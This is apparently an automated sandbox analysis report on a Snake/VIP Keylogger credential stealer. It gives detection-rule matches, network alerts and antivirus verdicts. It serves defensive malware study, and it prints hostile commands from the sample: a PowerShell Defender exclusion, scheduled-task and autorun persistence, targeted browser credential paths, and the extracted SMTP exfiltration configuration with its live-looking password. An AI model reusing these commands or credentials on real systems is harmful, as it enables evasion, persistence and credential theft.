57.2.duencaj.exe .3f0cd48.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x39c92:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x39335:$a3: \Google\Chrome\User Data\Default\Login Data 0x39592:$a4: \Orbitum\User Data\Default\Login Data 0x39f71:$a5: \Kometa\User Data\Default\Login Data
1.2.20250301_173245__p20250301_173245__p.exe .3d3cd40.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x39c92:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x39335:$a3: \Google\Chrome\User Data\Default\Login Data 0x39592:$a4: \Orbitum\User Data\Default\Login Data 0x39f71:$a5: \Kometa\User Data\Default\Login Data
57.2.duencaj.exe .3f0cd48.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
57.2.duencaj.exe .3f0cd48.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
1.2.20250301_173245__p20250301_173245__p.exe .3d3cd40.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2caa2:$s1: UnHook 0x2caa9:$s2: SetHook 0x2cab1:$s3: CallNextHook 0x2cabe:$s4: _hook
57.2.duencaj.exe .3f0cd48.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2caa2:$s1: UnHook 0x2caa9:$s2: SetHook 0x2cab1:$s3: CallNextHook 0x2cabe:$s4: _hook
57.2.duencaj.exe .3f0cd48.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dc6a:$a1: get_encryptedPassword 0x2dfa7:$a2: get_encryptedUsername 0x2da7a:$a3: get_timePasswordChanged 0x2db83:$a4: get_passwordField 0x2dc80:$a5: set_encryptedPassword 0x2f34c:$a7: get_logins 0x2f298:$a10: KeyLoggerEventArgs 0x2eefd:$a11: KeyLoggerEventArgsEventHandler
57.2.duencaj.exe .3f0cd48.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3ba92:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b135:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b392:$a4: \Orbitum\User Data\Default\Login Data 0x3bd71:$a5: \Kometa\User Data\Default\Login Data
57.2.duencaj.exe .3f0cd48.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2e8a2:$s1: UnHook 0x2e8a9:$s2: SetHook 0x2e8b1:$s3: CallNextHook 0x2e8be:$s4: _hook
1.2.20250301_173245__p20250301_173245__p.exe .45a37d0.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.20250301_173245__p20250301_173245__p.exe .45a37d0.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
1.2.20250301_173245__p20250301_173245__p.exe .45a37d0.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
1.2.20250301_173245__p20250301_173245__p.exe .45a37d0.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dc6a:$a1: get_encryptedPassword 0x2dfa7:$a2: get_encryptedUsername 0x2da7a:$a3: get_timePasswordChanged 0x2db83:$a4: get_passwordField 0x2dc80:$a5: set_encryptedPassword 0x2f34c:$a7: get_logins 0x2f298:$a10: KeyLoggerEventArgs 0x2eefd:$a11: KeyLoggerEventArgsEventHandler
1.2.20250301_173245__p20250301_173245__p.exe .45a37d0.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3ba92:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b135:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b392:$a4: \Orbitum\User Data\Default\Login Data 0x3bd71:$a5: \Kometa\User Data\Default\Login Data
1.2.20250301_173245__p20250301_173245__p.exe .45a37d0.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2e8a2:$s1: UnHook 0x2e8a9:$s2: SetHook 0x2e8b1:$s3: CallNextHook 0x2e8be:$s4: _hook
1.2.20250301_173245__p20250301_173245__p.exe .3d3cd40.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.20250301_173245__p20250301_173245__p.exe .3d3cd40.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
1.2.20250301_173245__p20250301_173245__p.exe .3d3cd40.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
1.2.20250301_173245__p20250301_173245__p.exe .3d3cd40.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dc6a:$a1: get_encryptedPassword 0x2dfa7:$a2: get_encryptedUsername 0x2da7a:$a3: get_timePasswordChanged 0x2db83:$a4: get_passwordField 0x2dc80:$a5: set_encryptedPassword 0x2f34c:$a7: get_logins 0x2f298:$a10: KeyLoggerEventArgs 0x2eefd:$a11: KeyLoggerEventArgsEventHandler
1.2.20250301_173245__p20250301_173245__p.exe .3d3cd40.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3ba92:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b135:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b392:$a4: \Orbitum\User Data\Default\Login Data 0x3bd71:$a5: \Kometa\User Data\Default\Login Data
1.2.20250301_173245__p20250301_173245__p.exe .3d3cd40.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2e8a2:$s1: UnHook 0x2e8a9:$s2: SetHook 0x2e8b1:$s3: CallNextHook 0x2e8be:$s4: _hook
Click to see the 34 entries

Sigma Signatures

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\icsys.icn.exe, ProcessId: 7348, TargetFilename: c:\windows\system\explorer.exe

Sigma detected: Interactive AT Job

Source: Process started

Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community: Data: Command: at 04:00 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe, CommandLine: at 04:00 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\at.exe, NewProcessName: C:\Windows\SysWOW64\at.exe, OriginalFileName: C:\Windows\SysWOW64\at.exe, ParentCommandLine: c:\windows\system\svchost.exe, ParentImage: C:\Windows\System\svchost.exe, ParentProcessId: 7488, ParentProcessName: svchost.exe, ProcessCommandLine: at 04:00 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe, ProcessId: 7544, ProcessName: at.exe

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "c:\users\user\desktop\20250301_173245__p20250301_173245__p.exe ", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "c:\users\user\desktop\20250301_173245__p20250301_173245__p.exe ", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: c:\users\user\desktop\20250301_173245__p20250301_173245__p.exe , ParentImage: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe , ParentProcessId: 7320, ParentProcessName: 20250301_173245__p20250301_173245__p.exe , ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "c:\users\user\desktop\20250301_173245__p20250301_173245__p.exe ", ProcessId: 8012, ProcessName: powershell.exe

Sigma detected: Suspect Svchost Activity

Source: Process started

Author: David Burkett, @signalblur: Data: Command: c:\windows\system\svchost.exe, CommandLine: c:\windows\system\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System\svchost.exe, NewProcessName: C:\Windows\System\svchost.exe, OriginalFileName: C:\Windows\System\svchost.exe, ParentCommandLine: c:\windows\system\spoolsv.exe SE, ParentImage: C:\Windows\System\spoolsv.exe, ParentProcessId: 7456, ParentProcessName: spoolsv.exe, ProcessCommandLine: c:\windows\system\svchost.exe, ProcessId: 7488, ProcessName: svchost.exe

Sigma detected: System File Execution Location Anomaly

Source: Process started

Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: c:\windows\system\explorer.exe, CommandLine: c:\windows\system\explorer.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System\explorer.exe, NewProcessName: C:\Windows\System\explorer.exe, OriginalFileName: C:\Windows\System\explorer.exe, ParentCommandLine: C:\Users\user\AppData\Local\icsys.icn.exe, ParentImage: C:\Users\user\AppData\Local\icsys.icn.exe, ParentProcessId: 7348, ParentProcessName: icsys.icn.exe, ProcessCommandLine: c:\windows\system\explorer.exe, ProcessId: 7412, ProcessName: explorer.exe

Sigma detected: Common Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), wagga (name): Data: Details: C:\Users\user\AppData\Roaming\mrsys.exe MR, EventID: 13, EventType: SetValue, Image: C:\Windows\System\explorer.exe, ProcessId: 7412, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666}\StubPath

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: c:\users\user\desktop\20250301_173245__p20250301_173245__p.exe , CommandLine: c:\users\user\desktop\20250301_173245__p20250301_173245__p.exe , CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe , NewProcessName: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe , OriginalFileName: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe , ParentCommandLine: "C:\Users\user\Desktop\20250301_173245__P20250301_173245__P.exe", ParentImage: C:\Users\user\Desktop\20250301_173245__P20250301_173245__P.exe, ParentProcessId: 7296, ParentProcessName: 20250301_173245__P20250301_173245__P.exe, ProcessCommandLine: c:\users\user\desktop\20250301_173245__p20250301_173245__p.exe , ProcessId: 7320, ProcessName: 20250301_173245__p20250301_173245__p.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dUENcAj" /XML "C:\Users\user\AppData\Local\Temp\tmp183D.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dUENcAj" /XML "C:\Users\user\AppData\Local\Temp\tmp183D.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: c:\users\user\appdata\roaming\duencaj.exe , ParentImage: C:\Users\user\AppData\Roaming\duencaj.exe , ParentProcessId: 4852, ParentProcessName: duencaj.exe , ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dUENcAj" /XML "C:\Users\user\AppData\Local\Temp\tmp183D.tmp", ProcessId: 3716, ProcessName: schtasks.exe

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 162.215.121.116, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe , Initiated: true, ProcessId: 7808, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49786

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dUENcAj" /XML "C:\Users\user\AppData\Local\Temp\tmpFEE9.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dUENcAj" /XML "C:\Users\user\AppData\Local\Temp\tmpFEE9.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: c:\users\user\desktop\20250301_173245__p20250301_173245__p.exe , ParentImage: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe , ParentProcessId: 7320, ParentProcessName: 20250301_173245__p20250301_173245__p.exe , ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dUENcAj" /XML "C:\Users\user\AppData\Local\Temp\tmpFEE9.tmp", ProcessId: 8176, ProcessName: schtasks.exe

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: c:\windows\system\svchost.exe, CommandLine: c:\windows\system\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System\svchost.exe, NewProcessName: C:\Windows\System\svchost.exe, OriginalFileName: C:\Windows\System\svchost.exe, ParentCommandLine: c:\windows\system\spoolsv.exe SE, ParentImage: C:\Windows\System\spoolsv.exe, ParentProcessId: 7456, ParentProcessName: spoolsv.exe, ProcessCommandLine: c:\windows\system\svchost.exe, ProcessId: 7488, ProcessName: svchost.exe

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: c:\windows\system\explorer.exe RO, EventID: 13, EventType: SetValue, Image: C:\Windows\System\explorer.exe, ProcessId: 7412, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "c:\users\user\desktop\20250301_173245__p20250301_173245__p.exe ", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "c:\users\user\desktop\20250301_173245__p20250301_173245__p.exe ", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: c:\users\user\desktop\20250301_173245__p20250301_173245__p.exe , ParentImage: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe , ParentProcessId: 7320, ParentProcessName: 20250301_173245__p20250301_173245__p.exe , ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "c:\users\user\desktop\20250301_173245__p20250301_173245__p.exe ", ProcessId: 8012, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7388, ProcessName: svchost.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dUENcAj" /XML "C:\Users\user\AppData\Local\Temp\tmpFEE9.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dUENcAj" /XML "C:\Users\user\AppData\Local\Temp\tmpFEE9.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: c:\users\user\desktop\20250301_173245__p20250301_173245__p.exe , ParentImage: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe , ParentProcessId: 7320, ParentProcessName: 20250301_173245__p20250301_173245__p.exe , ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dUENcAj" /XML "C:\Users\user\AppData\Local\Temp\tmpFEE9.tmp", ProcessId: 8176, ProcessName: schtasks.exe

Suricata Signatures

ET MALWARE Snake Keylogger Exfil via SMTP (VIP Recovery)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-05T09:58:39.705596+0100	2060048	1	Malware Command and Control Activity Detected	192.168.2.4	49786	162.215.121.116	587	TCP
2025-03-05T09:58:44.408586+0100	2060048	1	Malware Command and Control Activity Detected	192.168.2.4	49789	162.215.121.116	587	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-05T09:58:21.116344+0100	2803305	3	Unknown Traffic	192.168.2.4	49743	104.21.112.1	443	TCP
2025-03-05T09:58:23.718567+0100	2803305	3	Unknown Traffic	192.168.2.4	49747	104.21.112.1	443	TCP
2025-03-05T09:58:26.310320+0100	2803305	3	Unknown Traffic	192.168.2.4	49755	104.21.112.1	443	TCP
2025-03-05T09:58:27.741431+0100	2803305	3	Unknown Traffic	192.168.2.4	49762	104.21.112.1	443	TCP
2025-03-05T09:58:27.757110+0100	2803305	3	Unknown Traffic	192.168.2.4	49761	104.21.112.1	443	TCP
2025-03-05T09:58:29.155084+0100	2803305	3	Unknown Traffic	192.168.2.4	49765	104.21.112.1	443	TCP
2025-03-05T09:58:32.059396+0100	2803305	3	Unknown Traffic	192.168.2.4	49775	104.21.112.1	443	TCP
2025-03-05T09:58:34.919667+0100	2803305	3	Unknown Traffic	192.168.2.4	49780	104.21.112.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-05T09:58:19.439748+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49738	193.122.6.168	80	TCP
2025-03-05T09:58:20.557854+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49738	193.122.6.168	80	TCP
2025-03-05T09:58:21.786409+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49744	193.122.6.168	80	TCP
2025-03-05T09:58:24.945818+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49749	193.122.6.168	80	TCP
2025-03-05T09:58:25.705331+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49749	193.122.6.168	80	TCP
2025-03-05T09:58:27.033591+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49758	193.122.6.168	80	TCP
2025-03-05T09:58:28.455358+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49764	193.122.6.168	80	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-05T09:58:31.588370+0100	1810007	1	Potentially Bad Traffic	192.168.2.4	49774	149.154.167.220	443	TCP
2025-03-05T09:58:37.097247+0100	1810007	1	Potentially Bad Traffic	192.168.2.4	49783	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 20250301_173245__P20250301_173245__P.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\icsys.icn.exe	Avira: detection malicious, Label: TR/Patched.Ren.Gen
Source: C:\Users\user\AppData\Local\stsys.exe	Avira: detection malicious, Label: TR/Patched.Ren.Gen
Source: C:\Windows\System\spoolsv.exe	Avira: detection malicious, Label: TR/Patched.Ren.Gen
Source: C:\Users\user\AppData\Roaming\mrsys.exe	Avira: detection malicious, Label: TR/Patched.Ren.Gen
Source: C:\Users\user\AppData\Roaming\dUENcAj.exe	Avira: detection malicious, Label: TR/Patched.Ren.Gen
Source: C:\Windows\System\explorer.exe	Avira: detection malicious, Label: TR/Patched.Ren.Gen

Found malware configuration

Source: 00000001.00000002.1773144054.000000000462D000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "info@javedan-battery.com", "Password": "infojb@dotcom", "Host": "mail.javedan-battery.com", "Port": "587"}
Source: 00000001.00000002.1773144054.000000000462D000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "info@javedan-battery.com", "Password": "infojb@dotcom", "Host": "mail.javedan-battery.com", "Port": "587", "Version": "4.4"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\dUENcAj.exe	ReversingLabs: Detection: 92%
Source: C:\Users\user\AppData\Roaming\duencaj.exe	ReversingLabs: Detection: 34%
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	ReversingLabs: Detection: 34%

Multi AV Scanner detection for submitted file

Source: 20250301_173245__P20250301_173245__P.exe	Virustotal: Detection: 90%			Perma Link
Source: 20250301_173245__P20250301_173245__P.exe	ReversingLabs: Detection: 92%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Sample uses string decryption to hide its real strings

Source: 1.2.20250301_173245__p20250301_173245__p.exe .3d3cd40.1.unpack	String decryptor: info@javedan-battery.com
Source: 1.2.20250301_173245__p20250301_173245__p.exe .3d3cd40.1.unpack	String decryptor: infojb@dotcom
Source: 1.2.20250301_173245__p20250301_173245__p.exe .3d3cd40.1.unpack	String decryptor: mail.javedan-battery.com
Source: 1.2.20250301_173245__p20250301_173245__p.exe .3d3cd40.1.unpack	String decryptor: 587
Source: 1.2.20250301_173245__p20250301_173245__p.exe .3d3cd40.1.unpack	String decryptor:

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: 20250301_173245__P20250301_173245__P.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49740 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49752 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 51.81.194.202:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49774 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49783 version: TLS 1.2

Source:	Binary string: vznv.pdb source: 20250301_173245__p20250301_173245__p.exe , 00000001.00000000.1681689148.0000000000852000.00000002.00000001.01000000.00000006.sdmp, 20250301_173245__p20250301_173245__p.exe , 00000001.00000002.1777305488.0000000007347000.00000004.00000020.00020000.00000000.sdmp, 20250301_173245__P20250301_173245__P.exe, duencaj.exe .55.dr, dUENcAj.exe.1.dr, 20250301_173245__p20250301_173245__p.exe .0.dr
Source:	Binary string: vznv.pdbSHA256 source: 20250301_173245__p20250301_173245__p.exe , 00000001.00000000.1681689148.0000000000852000.00000002.00000001.01000000.00000006.sdmp, 20250301_173245__p20250301_173245__p.exe , 00000001.00000002.1777305488.0000000007347000.00000004.00000020.00020000.00000000.sdmp, 20250301_173245__P20250301_173245__P.exe, duencaj.exe .55.dr, dUENcAj.exe.1.dr, 20250301_173245__p20250301_173245__p.exe .0.dr

Source: C:\Users\user\Desktop\20250301_173245__P20250301_173245__P.exe	Code function: 4x nop then push ebp	0_2_00417143
Source: C:\Users\user\Desktop\20250301_173245__P20250301_173245__P.exe	Code function: 4x nop then push ebp	0_2_00416130
Source: C:\Users\user\Desktop\20250301_173245__P20250301_173245__P.exe	Code function: 4x nop then push ebp	0_2_004171D7
Source: C:\Users\user\Desktop\20250301_173245__P20250301_173245__P.exe	Code function: 4x nop then push ebp	0_2_004179F2
Source: C:\Users\user\Desktop\20250301_173245__P20250301_173245__P.exe	Code function: 4x nop then push ebp	0_2_00417190
Source: C:\Users\user\Desktop\20250301_173245__P20250301_173245__P.exe	Code function: 4x nop then push ebp	0_2_0041725A
Source: C:\Users\user\Desktop\20250301_173245__P20250301_173245__P.exe	Code function: 4x nop then push ebp	0_2_004172E5
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Code function: 4x nop then jmp 0273F45Dh	46_2_0273F2C0
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Code function: 4x nop then jmp 0273F45Dh	46_2_0273F4AC
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Code function: 4x nop then jmp 0273F45Dh	46_2_0273F52F
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Code function: 4x nop then jmp 0273FC19h	46_2_0273F961
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 4x nop then jmp 0158F45Dh	63_2_0158F2C0
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 4x nop then jmp 0158F45Dh	63_2_0158F52F
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 4x nop then jmp 0158F45Dh	63_2_0158F4AC
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 4x nop then jmp 0158FC19h	63_2_0158F961
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 4x nop then jmp 06DC3308h	63_2_06DC2EF0
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 4x nop then jmp 06DC2D41h	63_2_06DC2A90
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 4x nop then jmp 06DC3308h	63_2_06DC2EE6
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 4x nop then jmp 06DCD919h	63_2_06DCD670
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	63_2_06DC0673
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 4x nop then jmp 06DCEA79h	63_2_06DCE7D0
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 4x nop then jmp 06DCE1C9h	63_2_06DCDF20
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 4x nop then jmp 06DCF781h	63_2_06DCF4D8
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 4x nop then jmp 06DCEED1h	63_2_06DCEC28
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 4x nop then jmp 06DCD069h	63_2_06DCCDC0
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 4x nop then jmp 06DCDD71h	63_2_06DCDAC8
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 4x nop then jmp 06DCD4C1h	63_2_06DCD218
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 4x nop then jmp 06DC3308h	63_2_06DC3236
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 4x nop then jmp 06DCE621h	63_2_06DCE378
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 4x nop then jmp 06DC0D0Dh	63_2_06DC0B30
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 4x nop then jmp 06DC16F8h	63_2_06DC0B30
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 4x nop then jmp 06DCF329h	63_2_06DCF080
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	63_2_06DC0853
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	63_2_06DC0040
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Code function: 4x nop then jmp 06DCFBD9h	63_2_06DCF930

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2060048 - Severity 1 - ET MALWARE Snake Keylogger Exfil via SMTP (VIP Recovery) : 192.168.2.4:49786 -> 162.215.121.116:587
Source: Network traffic	Suricata IDS: 2060048 - Severity 1 - ET MALWARE Snake Keylogger Exfil via SMTP (VIP Recovery) : 192.168.2.4:49789 -> 162.215.121.116:587
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49783 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49774 -> 149.154.167.220:443

